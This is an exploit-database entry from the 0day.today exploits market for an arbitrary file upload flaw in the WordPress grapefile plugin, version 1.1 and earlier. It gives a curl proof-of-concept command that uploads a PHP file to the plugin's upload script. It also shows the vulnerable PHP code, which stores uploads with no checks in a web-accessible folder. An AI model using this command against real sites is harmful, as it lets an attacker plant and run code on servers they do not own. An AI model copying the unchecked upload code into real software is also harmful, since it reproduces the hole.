[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress grapefile plugin <= 1.1 Arbitrary File Upload

Author
Hrvoje Spoljar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16803
Category
web applications
Date add
30-08-2011
Platform
php
Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link:http://wordpress.org/extend/plugins/grapefile/
 
PoC:
curl -F "userfile=@mycode.php"
http://domain.tld/wp-content/plugins/grapefile/grapeupload.php
 
File(s): grapeupload.php  grapeupload2.php  grapeupload3.php
grapeupload4.php
Vulnerable code:
$uploaddir =
$_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
 
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";



#  0day.today [2024-11-15]  #